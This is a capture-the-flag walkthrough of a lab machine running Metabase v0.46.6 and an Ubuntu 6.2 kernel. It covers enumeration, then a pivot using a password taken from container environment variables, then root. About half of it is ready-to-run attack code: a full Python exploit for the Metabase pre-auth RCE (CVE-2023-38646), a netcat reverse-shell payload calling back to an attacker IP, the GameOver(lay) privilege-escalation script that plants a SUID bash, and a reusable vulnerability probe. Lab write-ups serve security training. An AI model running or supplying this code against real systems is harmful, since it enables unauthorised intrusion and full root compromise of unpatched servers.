Target IP: 10.129.229.224
Challenge Description: N/A.
Performing a port scan using the command sudo nmap -sS 10.129.229.224 -p- returns the result shown above. There are two TCP ports open on the target machine: SSH and HTTP on their standard ports.
I performed an aggressive port scan using the command sudo nmap -sV -A 10.129.229.224 -p 22,80 against the two TCP ports and retrieved the result shown above. According to the HTTP script output, the web server redirects to the hostname analytical.htb. I will need to add this hostname to my /etc/hosts before performing enumeration.
I added the hostname analytical.htb to my /etc/hosts file. Then I performed virtual-host (subdomain) enumeration using the command ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.analytical.htb" -u http://analytical.htb -fs 154 (the -fs 154 filters out the default response size) and discovered the subdomain data, as shown above. I will add this new hostname, data.analytical.htb, to my /etc/hosts file too. Time to begin enumeration now :)
Port 80: HTTP (analytical.htb)
The webpage above is displayed for this web application on port 80. I performed a directory search but I did not find anything useful. The website seems to be mainly static. However, pressing the Login button redirects me to http://data.analytical.htb.
Port 80: HTTP (data.analytical.htb)
The webpage above is displayed for this web application. The target machine seems to be running the Metabase application on this port. It asks for an email and password, but I have not found any credentials yet. Time to enumerate further.
Reading through the source code of the webpage, I identified the application version v0.46.6, as shown above. Is the target machine really running Metabase v0.46.6? Does that version have any known vulnerabilities? Time to find out.
Searching for Metabase v0.46.6 vulnerabilities on Google, I found the website above. This version is vulnerable to remote code execution without authentication. If the target machine is really running this version, then it is vulnerable to RCE, and I do not need any credentials to exploit it.
I searched for public exploits for this vulnerability and found the GitHub repository shown above. The vulnerability has the CVE ID CVE-2023-38646. The repository describes how to use the exploit. I made a copy of the exploit on my machine and renamed it exp.py. Time to test it now.
To run the exploit, I opened two terminals, as shown above. The top terminal is where I execute the exploit; the bottom terminal runs a listener on my machine on port 8443 to catch the reverse shell connection. First, I started the listener on port 8443. Then I base64-encoded the payload rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.139 8443 >/tmp/f and obtained cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xMzkgODQ0MyA+L3RtcC9m. To run the exploit, I used the command python3 exp.py -x cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xMzkgODQ0MyA+L3RtcC9m http://data.analytical.htb. I immediately received a reverse shell connection as the user metabase, as shown above.
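For reference, the two HTTP requests that exp.py automates are reproduced below. This is an added example written for this writeup, not the exploit from the repository: on vulnerable Metabase builds the unauthenticated endpoint /api/session/properties still exposes the setup-token, and /api/setup/validate accepts an H2 JDBC connection string whose trigger body is JavaScript executed inside the JVM, which is where the base64-encoded command is decoded and piped to bash. The sample properties JSON, the token in it and the target URL are constructed for illustration.

```python
import base64
import json
import urllib.error
import urllib.request
from typing import Optional

# Constructed, trimmed sample of what GET /api/session/properties returns.
SAMPLE_PROPERTIES = json.dumps({
    "version": {"tag": "v0.46.6", "date": "2023-07-19"},
    "setup-token": "00000000-1111-2222-3333-444444444444",
})


def extract_setup_token(properties_body: str) -> Optional[str]:
    """Return the leaked setup-token, or None if the field is absent (patched)."""
    return json.loads(properties_body).get("setup-token")


def extract_version_tag(properties_body: str) -> str:
    """Version tag reported by the instance (what the page found in the HTML)."""
    return json.loads(properties_body)["version"]["tag"]


def build_validate_body(setup_token: str, command: str) -> dict:
    """Build the POST /api/setup/validate body carrying the H2 payload.

    The command is base64-encoded so no shell metacharacters have to survive
    the JDBC URL; the trigger decodes it and hands it to bash.
    """
    b64 = base64.b64encode(command.encode()).decode()
    # '\;' keeps CREATE TRIGGER inside the same H2 property instead of starting
    # a new one; the $$...$$ block is an H2 source trigger written in JavaScript.
    jdbc = (
        "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;"
        "TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON "
        "INFORMATION_SCHEMA.TABLES AS $$//javascript\n"
        "java.lang.Runtime.getRuntime().exec("
        f"'bash -c {{echo,{b64}}}|{{base64,-d}}|{{bash,-i}}')\n$$--=x"
    )
    return {
        "token": setup_token,
        "details": {
            "is_on_demand": False, "is_full_sync": False, "is_sample": False,
            "cache_ttl": None, "refingerprint": False, "auto_run_queries": True,
            "schedules": {},
            "details": {"db": jdbc, "advanced-options": False, "ssl": True},
            "name": "x",
            "engine": "h2",
        },
    }


def exploit(base_url: str, command: str, timeout: float = 10.0) -> int:
    """Fetch the token, send the payload, return the HTTP status of the POST."""
    with urllib.request.urlopen(f"{base_url}/api/session/properties", timeout=timeout) as r:
        token = extract_setup_token(r.read().decode())
    if not token:
        raise RuntimeError("setup-token not exposed; target is probably patched")
    data = json.dumps(build_validate_body(token, command)).encode()
    req = urllib.request.Request(
        f"{base_url}/api/setup/validate", data=data,
        headers={"Content-Type": "application/json"}, method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return r.status
    except urllib.error.HTTPError as e:
        # H2 usually reports a connection error; the trigger may already have run,
        # so return the status and let the listener confirm success.
        return e.code


if __name__ == "__main__":
    import sys
    # Assumed usage: python3 this.py http://data.analytical.htb 'id > /tmp/probe'
    print(exploit(sys.argv[1], sys.argv[2]))
```

The `exploit` function is the only part that touches the network; the builder and parser run offline, which makes it easy to diff the generated body against whatever a third-party PoC sends before pointing it at a target.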
I executed the command printenv and obtained the result shown above. The password An4lytics_ds20223# of the user metalytics is stored in the variable META_PASS. I have landed in a Docker container, as I have very little control over the target machine in this session. Maybe I can now access the web application using these new credentials?
Using these credentials, I managed to log into the web application. There is an unusual name, Johnny. Is this user an administrator of the web application?
After some manual enumeration of the web application, I noticed that the user is an admin, as shown above. I tried to find other attack vectors that would give me a higher-privileged reverse shell, but I had no luck. I looked for consoles that allow command execution, pages that allow uploading a web shell, and so on, but found nothing. SSH is open on port 22. Maybe I can SSH into the target machine as metalytics (ssh metalytics@analytical.htb) with the password An4lytics_ds20223#?
And it worked. Now I have an SSH session as the user metalytics on the target machine itself, outside the container. I successfully moved laterally (horizontal privilege escalation).
The target machine is running kernel version 6.2.0-25-generic on Ubuntu 22.04.3 LTS. From previous knowledge, I know this kernel version is vulnerable to the GameOver(lay) Ubuntu privilege escalation (CVE-2023-2640 and CVE-2023-32629).
I found the GitHub repository shown above for this vulnerability. Then I copied the script from this repository onto the target machine for privilege escalation.
In the /tmp directory, I saved the script as exp.sh. Then I made the script executable. I executed it and obtained a root shell, as shown above. Now I have root access on the target machine :) The content of the script is shown below:
#!/bin/bash
# CVE-2023-2640 CVE-2023-32629: GameOver(lay) Ubuntu Privilege Escalation
# by g1vi https://github.com/g1vi
# October 2023
echo "[+] You should be root now"
echo "[+] Type 'exit' to finish and leave the house cleaned"
# In a new user+mount namespace (unshare -rm maps our uid to root there): copy the
# host python3 into lower dir l/, give it cap_setuid as namespace "root", mount an
# overlayfs (lower l, upper u, work w) on m/ and touch the file through m/ so that
# overlayfs copies python3 up into u/. The bug: the capability xattr is copied up
# without being re-scoped to the namespace, so u/python3 has cap_setuid on the host.
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
# Back on the host, u/python3 uses that capability to setuid(0), plants a SUID-root
# copy of bash, runs it with -p, and removes the overlay dirs and the SUID copy on exit.
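When I only want to confirm that a host is affected (for example during an assessment where dropping a SUID bash into /var/tmp is not acceptable), the same namespace and overlay steps can be run in a throwaway directory and the copied-up python3 asked whether setuid(0) succeeds, reporting the result and cleaning up. The following is an added example written for this writeup, not the g1vi script; it assumes unshare, setcap and overlayfs are available and that /tmp is not mounted nosuid (true on stock Ubuntu).

```python
import os
import shutil
import subprocess
import tempfile

# Program executed by the copied-up python3: it only reports, never keeps root.
PROBE = (
    "import os\n"
    "try:\n"
    "    os.setuid(0)\n"
    "    print('euid', os.geteuid())\n"
    "except PermissionError:\n"
    "    print('denied')\n"
)


def setup_command(workdir: str, python: str) -> str:
    """Shell run inside 'unshare -rm': build l/u/w/m, cap the copy, copy it up."""
    return (
        f"cd '{workdir}' && mkdir l u w m && cp '{python}' l/python3 && "
        "setcap cap_setuid+eip l/python3 && "
        "mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && "
        "touch m/python3"
    )


def interpret(probe_stdout: str) -> str:
    """Turn the probe's output into a verdict."""
    out = probe_stdout.strip()
    if out == "euid 0":
        return "vulnerable"
    if out == "denied":
        return "not vulnerable"
    return "inconclusive"


def probe_gameoverlay(python: str = "/usr/bin/python3") -> str:
    """Run the overlay copy-up in a temp dir and check the host-side capability."""
    workdir = tempfile.mkdtemp(prefix="goprobe.", dir="/tmp")
    try:
        setup = subprocess.run(
            ["unshare", "-rm", "sh", "-c", setup_command(workdir, python)],
            capture_output=True, text=True,
        )
        if setup.returncode != 0:
            return f"inconclusive: setup failed: {setup.stderr.strip()}"
        # After the namespace exits the overlay mount is gone, but u/python3 stays,
        # carrying whatever capability the kernel copied up.
        copied = os.path.join(workdir, "u", "python3")
        run = subprocess.run([copied, "-c", PROBE], capture_output=True, text=True)
        return interpret(run.stdout)
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    print(probe_gameoverlay())
```

On a patched kernel the copied-up file no longer carries a usable cap_setuid, so the probe prints "denied" and the verdict is "not vulnerable"; on the page's 6.2.0-25 kernel it should report "vulnerable", which is the point at which the real script can be used.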
The two flags are shown above.